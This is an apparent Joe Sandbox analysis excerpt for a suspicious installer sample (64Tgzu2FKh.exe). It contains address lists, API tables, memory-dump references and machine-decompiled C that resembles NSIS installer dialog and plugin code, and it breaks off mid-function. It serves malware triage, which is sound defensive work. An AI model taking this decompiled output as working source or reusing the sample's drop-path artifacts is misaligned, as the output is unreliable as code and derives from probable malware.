0x00404f79
0x00404f7b
0x00404f85
0x00404f8b
0x00404f8e
0x00404f91
0x00404fac
0x00404f93
0x00404f9d
0x00404f9d
0x00404f91
0x00404f85
0x00000000
0x00404f5f
0x00404eec
0x00404ef7
0x00404efc
0x00404f03
0x00404f08
0x00404f0c
0x00404f17
0x00404f17
0x00404f1b
0x00404f1f
0x00404f23
0x00404f36
0x00404f25
0x00404f25
0x00404f2c
0x00404f32
0x00404f2e
0x00404f2e
0x00404f2e
0x00404f2c
0x00404f3a
0x00404f3c
0x00404f4f
0x00404f52
0x00404f55
0x00404f55
0x00404f1f
0x00000000
0x00404f0c
0x00404eee
0x00404ef5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404faf
0x00404faf
0x00404fb6
0x00405027
0x0040502f
0x00405037
0x00405037
0x00405040
0x00405042
0x00405049
0x0040504c
0x0040504c
0x00405052
0x00405059
0x0040505c
0x0040505c
0x00405062
0x00405068
0x0040506e
0x0040506e
0x0040507b
0x004051d1
0x004051d8
0x004051f5
0x004051fb
0x0040520d
0x0040520d
0x00000000
0x00405081
0x00405083
0x00405088
0x0040508d
0x00405092
0x00405094
0x00405094
0x00405095
0x00405096
0x00405098
0x00405098
0x004050a0
0x004050e1
0x004050e3
0x004050f3
0x004050f6
0x004050fb
0x00405102
0x00405105
0x004051a7
0x004051ad
0x004051bb
0x004051cc
0x004051cc
0x00000000
0x004051bb
0x0040510b
0x0040510e
0x00405114
0x00405119
0x0040511b
0x0040511d
0x00405123
0x0040512a
0x0040512f
0x00405136
0x00405139
0x00405139
0x00405140
0x0040514c
0x00405150
0x00405152
0x00405152
0x00405142
0x00405144
0x00405144
0x00405172
0x0040517e
0x0040518d
0x0040518d
0x0040518f
0x00405192
0x0040519b
0x00000000
0x004050a2
0x004050ad
0x004050b0
0x004050b5
0x004050b7
0x004050bb
0x004050cb
0x004050d5
0x004050d7
0x004050da
0x00000000
0x00000000
0x00000000
0x00000000
0x004050bd
0x004050bd
0x004050c3
0x004050c5
0x004050c5
0x004050c6
0x004050c7
0x00000000
0x004050bd
0x004050a0
0x0040507b
0x00404fbe
0x00000000
0x00404fd4
0x00404fde
0x00404fe3
0x00000000
0x00000000
0x00404ff5
0x00404ffa
0x00405006
0x00405006
0x00405008
0x00405017
0x00405019
0x0040501d
0x00405020
0x00000000
0x00405020
0x00404fbe
0x00404c7e
0x00404c83
0x00404c8c
0x00404c93
0x00404ca1
0x00404cac
0x00404cb2
0x00404cc0
0x00404cd4
0x00404cd9
0x00404ce6
0x00404ceb
0x00404d01
0x00404d12
0x00404d1f
0x00404d1f
0x00404d22
0x00404d28
0x00404d2a
0x00404d2d
0x00404d32
0x00404d37
0x00404d39
0x00404d39
0x00404d59
0x00404d59
0x00404d5b
0x00404d5c
0x00404d61
0x00404d64
0x00404d67
0x00404d6b
0x00404d70
0x00404d75
0x00404d79
0x00404d7e
0x00404d83
0x00404d85
0x00404d8d
0x00404e58
0x00404e6b
0x00000000
0x00404d93
0x00404d96
0x00404d99
0x00404d9c
0x00404d9c
0x00404da3
0x00404da9
0x00404dac
0x00404db2
0x00404db3
0x00404db8
0x00404dc1
0x00404dc8
0x00404dcb
0x00404dce
0x00404dd1
0x00404e0d
0x00404e36
0x00404e0f
0x00404e1c
0x00404e1c
0x00404dd3
0x00404dd6
0x00404de5
0x00404def
0x00404df7
0x00404dfe
0x00404e06
0x00404e06
0x00404dd1
0x00404e3c
0x00404e3d
0x00404e49
0x00404e49
0x00404e56
0x00404e71
0x00404e75
0x00404e92
0x00404e97
0x00000000
0x00404e77
0x00404e7c
0x00404e85
0x0040520f
0x00405221
0x00405221
0x00404e75
0x00000000
0x00404e56
0x00404d8d

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404C44
GetDlgItem.USER32(?,00000408), ref: 00404C4F
GlobalAlloc.KERNEL32(00000040,?), ref: 00404C99
LoadBitmapW.USER32(0000006E), ref: 00404CAC
SetWindowLongW.USER32(?,000000FC,00405224), ref: 00404CC5
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404CD9
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404CEB
SendMessageW.USER32(?,00001109,00000002), ref: 00404D01
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D0D
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D1F
DeleteObject.GDI32(00000000), ref: 00404D22
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D4D
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D59
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404DEF
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E1A
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2E
GetWindowLongW.USER32(?,000000F0), ref: 00404E5D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E6B
ShowWindow.USER32(?,00000005), ref: 00404E7C
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404F79
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404FDE
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404FF3
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405017
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405037
ImageList_Destroy.COMCTL32(?), ref: 0040504C
GlobalFree.KERNEL32(?), ref: 0040505C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004050D5
SendMessageW.USER32(?,00001102,?,?), ref: 0040517E
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040518D
InvalidateRect.USER32(?,00000000,00000001), ref: 004051AD
ShowWindow.USER32(?,00000000), ref: 004051FB
GetDlgItem.USER32(?,000003FE), ref: 00405206
ShowWindow.USER32(00000000), ref: 0040520D

Strings

, xrefs: 004051E5
N, xrefs: 00404EB7
M, xrefs: 00404DD6

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 0e3101dbd3652d4f757db737ae7fb43f4819026ea9b1eefe658abe3e9785d0fb
Instruction ID: 31f8c2f88752af3cc61dfe1620f9b722711d108b5774519bd23904c74dbe123e
Opcode Fuzzy Hash: 0e3101dbd3652d4f757db737ae7fb43f4819026ea9b1eefe658abe3e9785d0fb
Instruction Fuzzy Hash: BD0282B0A00209EFDB209F95DD85AAE7BB5FB44314F10417AF610BA2E1C7799D52CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004046B0 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E004046B0(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x4226c0; // 0x532ebc
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405892(0x3fb, _t146);
					E004064E0(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405892(0x3fb, _t146);
							if(E00405C25(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040624C(0x4216b8, _t146);
							_t87 = E00406626(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040624C(0x4216b8, _t146);
								_t89 = E00405BC8(0x4216b8);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x4216b8,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x4216b8) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x4216b8,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405B69(0x4216b8);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x4216b8) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404B4D(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x4291dc + 0x10)) != _t158) {
									E00404B35(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x4216a8);
									} else {
										E00404A6C(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a2c4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E00404203(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x4236d8 == _t158) {
									E00404609();
								}
								 *0x4236d8 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x4236e8;
							_v60 = E00404A06;
							_v56 = _t146;
							_v68 = E0040626E(_t146, 0x4236e8, _t167, 0x421ec0, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405B1D(_t146);
								_t125 =  *((intOrPtr*)( *0x42a214 + 0x11c));
								if( *((intOrPtr*)( *0x42a214 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth") {
									E0040626E(_t146, 0x4236e8, _t167, 0, _t125);
									if(lstrcmpiW(0x4281a0, 0x4236e8) != 0) {
										lstrcatW(_t146, 0x4281a0);
									}
								}
								 *0x4236d8 =  *0x4236d8 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405B94(_t146) != 0 && E00405BC8(_t146) == 0) {
						E00405B1D(_t146);
					}
					 *0x4291d8 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004041E1(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004041E1(_t167);
					E00404216(_t166);
					_t138 = E00406626(7);
					if(_t138 == 0) {
						L53:
						return E00404248(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}

0x004046b0
0x004046b6
0x004046bc
0x004046c9
0x004046d7
0x004046da
0x004046e2
0x004046e8
0x004046e8
0x004046f4
0x004046f7
0x00404765
0x0040476c
0x00404843
0x0040484a
0x00404859
0x00404859
0x0040485d
0x00404867
0x00404874
0x00404876
0x00404876
0x00404884
0x0040488b
0x00404892
0x00404895
0x004048d1
0x004048d3
0x004048d9
0x004048de
0x004048e2
0x004048e4
0x004048e4
0x00404900
0x00000000
0x00404902
0x00404905
0x00404913
0x00404919
0x0040491a
0x0040491d
0x00404920
0x00000000
0x00404920
0x00404897
0x00404899
0x0040489d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040489f
0x0040489f
0x004048ac
0x004048b1
0x00000000
0x00000000
0x004048b5
0x004048b7
0x004048b7
0x004048c0
0x004048c2
0x004048c7
0x004048ca
0x004048cf
0x00000000
0x00000000
0x00000000
0x00000000
0x004048cf
0x0040492c
0x00404936
0x00404939
0x0040493c
0x00404943
0x00404943
0x00404945
0x00404945
0x0040494a
0x0040494c
0x00404954
0x0040495b
0x0040495d
0x00404968
0x00404968
0x0040495d
0x00404978
0x00404982
0x0040498a
0x004049a5
0x0040498c
0x00404995
0x00404995
0x0040498a
0x004049aa
0x004049af
0x004049b4
0x004049bd
0x004049bd
0x004049c6
0x004049c8
0x004049c8
0x004049d4
0x004049dc
0x004049e6
0x004049e6
0x004049eb
0x00000000
0x004049eb
0x00404895
0x0040484c
0x00404853
0x00000000
0x00000000
0x00000000
0x00404853
0x00404772
0x0040477b
0x00404795
0x0040479a
0x004047a4
0x004047ab
0x004047b7
0x004047ba
0x004047bd
0x004047c4
0x004047cc
0x004047cf
0x004047d3
0x004047da
0x004047e2
0x0040483c
0x004047e4
0x004047e5
0x004047ec
0x004047f6
0x004047fe
0x0040480b
0x0040481f
0x00404823
0x00404823
0x0040481f
0x00404828
0x00404835
0x00404835
0x004047e2
0x00000000
0x0040479a
0x00404788
0x00000000
0x00000000
0x0040478e
0x00000000
0x004046f9
0x00404706
0x0040470f
0x0040471c
0x0040471c
0x00404723
0x00404729
0x00404732
0x00404735
0x00404738
0x00404740
0x00404743
0x00404746
0x0040474c
0x00404753
0x0040475a
0x004049f1
0x00404a03
0x00404760
0x00404763
0x00000000
0x00404763
0x0040475a

APIs

GetDlgItem.USER32(?,000003FB), ref: 004046FF
SetWindowTextW.USER32(00000000,?), ref: 00404729
SHBrowseForFolderW.SHELL32(?), ref: 004047DA
CoTaskMemFree.OLE32(00000000), ref: 004047E5
lstrcmpiW.KERNEL32(Call,004236E8,00000000,?,?), ref: 00404817
lstrcatW.KERNEL32(?,Call), ref: 00404823
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404835

Part of subcall function 00405892: GetDlgItemTextW.USER32(?,?,00000400,0040486C), ref: 004058A5

Part of subcall function 004064E0: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\64Tgzu2FKh.exe",00403318,C:\Users\user\AppData\Local\Temp\,75333420,00403589,?,00000006,00000008,0000000A), ref: 00406543
Part of subcall function 004064E0: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406552
Part of subcall function 004064E0: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\64Tgzu2FKh.exe",00403318,C:\Users\user\AppData\Local\Temp\,75333420,00403589,?,00000006,00000008,0000000A), ref: 00406557
Part of subcall function 004064E0: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\64Tgzu2FKh.exe",00403318,C:\Users\user\AppData\Local\Temp\,75333420,00403589,?,00000006,00000008,0000000A), ref: 0040656A

GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?), ref: 004048F8
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404913

Part of subcall function 00404A6C: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B0D
Part of subcall function 00404A6C: wsprintfW.USER32 ref: 00404B16
Part of subcall function 00404A6C: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B29

Strings

Call, xrefs: 00404811, 00404816, 00404821
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth, xrefs: 00404800
6B, xrefs: 004047AD
A, xrefs: 004047D3

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth$Call$6B
API String ID: 2624150263-1065254660
Opcode ID: b1d243ae95704861e4402fcc76362414c1757fd644608bb3aee2509e1b30c864
Instruction ID: 3caff43168dd0751864d44f5cbb06f26c6104a46936f7057387f9fb8a2ee2b83
Opcode Fuzzy Hash: b1d243ae95704861e4402fcc76362414c1757fd644608bb3aee2509e1b30c864
Instruction Fuzzy Hash: DFA197F1A00209ABDB11AFA5CD45AAF77B8EF84714F10843BF601B62D1D77C99418B6D

Uniqueness

Uniqueness Score: -1.00%

Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E10001B18() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				WCHAR* _v44;
				signed int _v48;
				void* _v52;
				intOrPtr _v56;
				WCHAR* _t199;
				signed int _t202;
				void* _t204;
				void* _t206;
				WCHAR* _t208;
				void* _t216;
				struct HINSTANCE__* _t217;
				struct HINSTANCE__* _t218;
				struct HINSTANCE__* _t220;
				signed short _t222;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t227;
				void* _t228;
				intOrPtr* _t229;
				void* _t240;
				signed char _t241;
				signed int _t242;
				struct HINSTANCE__* _t248;
				void* _t249;
				signed int _t251;
				short* _t253;
				signed int _t259;
				void* _t260;
				signed int _t263;
				signed int _t266;
				signed int _t267;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				void* _t278;
				void* _t282;
				struct HINSTANCE__* _t284;
				signed int _t287;
				void _t288;
				signed int _t289;
				signed int _t301;
				signed int _t302;
				signed short _t308;
				signed int _t309;
				WCHAR* _t310;
				WCHAR* _t312;
				WCHAR* _t313;
				struct HINSTANCE__* _t314;
				void* _t316;
				signed int _t318;
				void* _t319;

				_t284 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t319 = 0;
				_v48 = 0;
				_t199 = E1000121B();
				_v24 = _t199;
				_v28 = _t199;
				_v44 = E1000121B();
				_t309 = E10001243();
				_v52 = _t309;
				_v12 = _t309;
				while(1) {
					_t202 = _v32;
					_v56 = _t202;
					if(_t202 != _t284 && _t319 == _t284) {
						break;
					}
					_t308 =  *_t309;
					_t287 = _t308 & 0x0000ffff;
					_t204 = _t287 - _t284;
					if(_t204 == 0) {
						_t33 =  &_v32;
						 *_t33 = _v32 | 0xffffffff;
						__eflags =  *_t33;
						L17:
						_t206 = _v56 - _t284;
						if(_t206 == 0) {
							__eflags = _t319 - _t284;
							 *_v28 = _t284;
							if(_t319 == _t284) {
								_t319 = GlobalAlloc(0x40, 0x1ca4);
								 *(_t319 + 0x1010) = _t284;
								 *(_t319 + 0x1014) = _t284;
							}
							_t288 = _v36;
							_t43 = _t319 + 8; // 0x8
							_t208 = _t43;
							_t44 = _t319 + 0x808; // 0x808
							_t310 = _t44;
							 *_t319 = _t288;
							_t289 = _t288 - _t284;
							__eflags = _t289;
							 *_t208 = _t284;
							 *_t310 = _t284;
							 *(_t319 + 0x1008) = _t284;
							 *(_t319 + 0x100c) = _t284;
							 *(_t319 + 4) = _t284;
							if(_t289 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L39;
								}
								_t316 = 0;
								GlobalFree(_t319);
								_t319 = E10001311(_v24);
								__eflags = _t319 - _t284;
								if(_t319 == _t284) {
									goto L39;
								} else {
									goto L32;
								}
								while(1) {
									L32:
									_t240 =  *(_t319 + 0x1ca0);
									__eflags = _t240 - _t284;
									if(_t240 == _t284) {
										break;
									}
									_t316 = _t319;
									_t319 = _t240;
									__eflags = _t319 - _t284;
									if(_t319 != _t284) {
										continue;
									}
									break;
								}
								__eflags = _t316 - _t284;
								if(_t316 != _t284) {
									 *(_t316 + 0x1ca0) = _t284;
								}
								_t241 =  *(_t319 + 0x1010);
								__eflags = _t241 & 0x00000008;
								if((_t241 & 0x00000008) == 0) {
									_t242 = _t241 | 0x00000002;
									__eflags = _t242;
									 *(_t319 + 0x1010) = _t242;
								} else {
									_t319 = E1000158F(_t319);
									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) & 0xfffffff5;
								}
								goto L39;
							} else {
								_t301 = _t289 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									L28:
									lstrcpyW(_t208, _v44);
									L29:
									lstrcpyW(_t310, _v24);
									L39:
									_v12 = _v12 + 2;
									_v28 = _v24;
									L63:
									if(_v32 != 0xffffffff) {
										_t309 = _v12;
										continue;
									}
									break;
								}
								_t302 = _t301 - 1;
								__eflags = _t302;
								if(_t302 == 0) {
									goto L29;
								}
								__eflags = _t302 != 1;
								if(_t302 != 1) {
									goto L39;
								}
								goto L28;
							}
						}
						if(_t206 != 1) {
							goto L39;
						}
						_t248 = _v16;
						if(_v40 == _t284) {
							_t248 = _t248 - 1;
						}
						 *(_t319 + 0x1014) = _t248;
						goto L39;
					}
					_t249 = _t204 - 0x23;
					if(_t249 == 0) {
						__eflags = _t309 - _v52;
						if(_t309 <= _v52) {
							L15:
							_v32 = _t284;
							_v36 = _t284;
							goto L17;
						}
						__eflags =  *((short*)(_t309 - 2)) - 0x3a;
						if( *((short*)(_t309 - 2)) != 0x3a) {
							goto L15;
						}
						__eflags = _v32 - _t284;
						if(_v32 == _t284) {
							L40:
							_t251 = _v32 - _t284;
							__eflags = _t251;
							if(_t251 == 0) {
								__eflags = _t287 - 0x2a;
								if(_t287 == 0x2a) {
									_v36 = 2;
									L61:
									_t309 = _v12;
									_v28 = _v24;
									_t284 = 0;
									__eflags = 0;
									L62:
									_t318 = _t309 + 2;
									__eflags = _t318;
									_v12 = _t318;
									goto L63;
								}
								__eflags = _t287 - 0x2d;
								if(_t287 == 0x2d) {
									L131:
									__eflags = _t308 - 0x2d;
									if(_t308 != 0x2d) {
										L134:
										_t253 = _t309 + 2;
										__eflags =  *_t253 - 0x3a;
										if( *_t253 != 0x3a) {
											L141:
											_v28 =  &(_v28[0]);
											 *_v28 = _t308;
											goto L62;
										}
										__eflags = _t308 - 0x2d;
										if(_t308 == 0x2d) {
											goto L141;
										}
										_v36 = 1;
										L137:
										_v12 = _t253;
										__eflags = _v28 - _v24;
										if(_v28 <= _v24) {
											 *_v44 = _t284;
										} else {
											 *_v28 = _t284;
											lstrcpyW(_v44, _v24);
										}
										goto L61;
									}
									_t253 = _t309 + 2;
									__eflags =  *_t253 - 0x3e;
									if( *_t253 != 0x3e) {
										goto L134;
									}
									_v36 = 3;
									goto L137;
								}
								__eflags = _t287 - 0x3a;
								if(_t287 != 0x3a) {
									goto L141;
								}
								goto L131;
							}
							_t259 = _t251 - 1;
							__eflags = _t259;
							if(_t259 == 0) {
								L74:
								_t260 = _t287 - 0x22;
								__eflags = _t260 - 0x55;
								if(_t260 > 0x55) {
									goto L61;
								}
								switch( *((intOrPtr*)(( *(_t260 + 0x10002230) & 0x000000ff) * 4 +  &M100021CC))) {
									case 0:
										__ecx = _v24;
										__edi = _v12;
										while(1) {
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L116;
											}
											L115:
											__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
											if( *((intOrPtr*)(__edi + 2)) != __dx) {
												L120:
												 *__ecx =  *__ecx & 0x00000000;
												__ebx = E1000122C(_v24);
												goto L91;
											}
											L116:
											__eflags = __ax;
											if(__ax == 0) {
												goto L120;
											}
											__eflags = __ax - __dx;
											if(__ax == __dx) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												__eflags = __edi;
											}
											__ax =  *__edi;
											 *__ecx =  *__edi;
											__ecx = __ecx + 1;
											__ecx = __ecx + 1;
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L116;
											}
											goto L115;
										}
									case 1:
										_v8 = 1;
										goto L61;
									case 2:
										_v8 = _v8 | 0xffffffff;
										goto L61;
									case 3:
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v16 = _v16 + 1;
										goto L79;
									case 4:
										__eflags = _v20;
										if(_v20 != 0) {
											goto L61;
										}
										_v12 = _v12 - 2;
										__ebx = E1000121B();
										 &_v12 = E10001A9F( &_v12);
										__eax = E10001470(__edx, __eax, __edx, __ebx);
										goto L91;
									case 5:
										L99:
										_v20 = _v20 + 1;
										goto L61;
									case 6:
										_push(7);
										goto L107;
									case 7:
										_push(0x19);
										goto L127;
									case 8:
										_push(0x15);
										goto L127;
									case 9:
										_push(0x16);
										goto L127;
									case 0xa:
										_push(0x18);
										goto L127;
									case 0xb:
										_push(5);
										goto L107;
									case 0xc:
										__eax = 0;
										__eax = 1;
										goto L85;
									case 0xd:
										_push(6);
										goto L107;
									case 0xe:
										_push(2);
										goto L107;
									case 0xf:
										_push(3);
										goto L107;
									case 0x10:
										_push(0x17);
										L127:
										_pop(__ebx);
										goto L92;
									case 0x11:
										__eax =  &_v12;
										__eax = E10001A9F( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										__eflags = __ebx - 0xb;
										if(__ebx < 0xb) {
											__ebx = __ebx + 0xa;
										}
										goto L91;
